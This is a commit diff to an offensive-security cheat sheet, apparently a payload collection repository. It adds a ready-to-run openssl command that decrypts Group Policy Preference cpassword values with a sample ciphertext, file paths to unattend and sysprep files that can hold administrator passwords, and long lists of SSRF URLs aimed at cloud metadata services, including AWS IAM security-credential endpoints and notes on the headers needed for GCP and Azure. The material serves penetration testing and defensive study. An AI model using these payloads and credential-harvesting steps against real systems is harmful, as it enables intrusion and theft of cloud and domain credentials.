GPP decrypt + SSRF url for cloud providers

Methodology and Resources/Active Directory Attack.md

@@ -64,6 +64,13 @@ Find password in SYSVOL
 findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
 ```
 
+Decrypt a password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280))
+```bash
+echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
+
+e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
+```
+
 Metasploit modules to enumerate shares and credentials
 ```c
 scanner/smb/smb_enumshares
@@ -134,6 +141,12 @@ PowerSploit module
 Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
 ```
 
+## Password in AD User comment
+```powershell
+enum4linux | grep -i desc
+There are 3-4 fields that seem to be common in most AD schemas: 
+UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
+```
 
 
 ### Golden Tickets

Methodology and Resources/Windows - Privilege Escalation.md

@@ -113,6 +113,34 @@ Read a value of a certain sub key
 REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 ```
 
+Password in unattend.xml
+```powershell
+C:\unattend.xml
+C:\Windows\Panther\Unattend.xml
+C:\Windows\Panther\Unattend\Unattend.xml
+C:\Windows\system32\sysprep.inf
+C:\Windows\system32\sysprep\sysprep.xml
+```
+```powershell
+   <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
+    <AutoLogon>
+     <Password>*SENSITIVE*DATA*DELETED*</Password>
+     <Enabled>true</Enabled> 
+     <Username>Administrateur</Username> 
+    </AutoLogon>
+
+    <UserAccounts>
+     <LocalAccounts>
+      <LocalAccount wcm:action="add">
+       <Password>*SENSITIVE*DATA*DELETED*</Password>
+       <Group>administrators;users</Group>
+       <Name>Administrateur</Name>
+      </LocalAccount>
+     </LocalAccounts>
+    </UserAccounts>
+```
+The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
+
 ## Processes Enum
 What processes are running?
 ```powershell

SSRF injection/README.md

@@ -195,7 +195,7 @@ Content of evil.com/redirect.php:
 ```
 
 
-## SSRF on AWS Bucket
+## SSRF on AWS Bucket - [Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
 Interesting path to look for at http://169.254.169.254
 ```
 Always here : /latest/meta-data/{hostname,public-ipv4,...}
@@ -230,6 +230,97 @@ http://0251.0376.0251.0376/ Dotted octal
 http://0251.00376.000251.0000376/ Dotted octal with padding
 ```
 
+More urls to include
+```
+http://169.254.169.254/latest/user-data
+http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
+http://169.254.169.254/latest/meta-data/
+http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
+http://169.254.169.254/latest/meta-data/ami-id
+http://169.254.169.254/latest/meta-data/reservation-id
+http://169.254.169.254/latest/meta-data/hostname
+http://169.254.169.254/latest/meta-data/public-keys/
+http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
+http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
+```
+
+## SSRF URL for Google Cloud
+Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
+```
+http://169.254.169.254/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/
+http://metadata/computeMetadata/v1/
+http://metadata.google.internal/computeMetadata/v1/instance/hostname
+http://metadata.google.internal/computeMetadata/v1/instance/id
+http://metadata.google.internal/computeMetadata/v1/project/project-id
+```
+
+Google allows recursive pulls 
+```
+http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
+```
+
+Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
+```
+http://metadata.google.internal/computeMetadata/v1beta1/
+```
+
+
+## SSRF URL for Digital Ocean
+https://developers.digitalocean.com/documentation/metadata/
+```
+http://169.254.169.254/metadata/v1.json
+http://169.254.169.254/metadata/v1/ 
+http://169.254.169.254/metadata/v1/id
+http://169.254.169.254/metadata/v1/user-data
+http://169.254.169.254/metadata/v1/hostname
+http://169.254.169.254/metadata/v1/region
+http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
+```
+
+## SSRF URL for Packetcloud
+```
+https://metadata.packet.net/userdata
+```
+
+## SSRF URL for Azure
+Limited, maybe more exist? https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/
+```
+http://169.254.169.254/metadata/v1/maintenance
+```
+
+Update Apr 2017, Azure has more support; requires the header "Metadata: true"  https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
+```
+http://169.254.169.254/metadata/instance?api-version=2017-04-02
+http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
+```
+
+## SSRF URL for OpenStack/RackSpace 
+(header required? unknown)
+```
+http://169.254.169.254/openstack
+```
+
+## SSRF URL for HP Helion 
+(header required? unknown)
+```
+http://169.254.169.254/2009-04-04/meta-data/ 
+```
+
+## SSRF URL for Oracle Cloud
+```
+http://192.0.0.192/latest/
+http://192.0.0.192/latest/user-data/
+http://192.0.0.192/latest/meta-data/
+http://192.0.0.192/latest/attributes/
+```
+
+## SSRF URL for Alibaba
+```
+http://100.100.100.200/latest/meta-data/
+http://100.100.100.200/latest/meta-data/instance-id
+http://100.100.100.200/latest/meta-data/image-id
+```
 
 
 ## Thanks to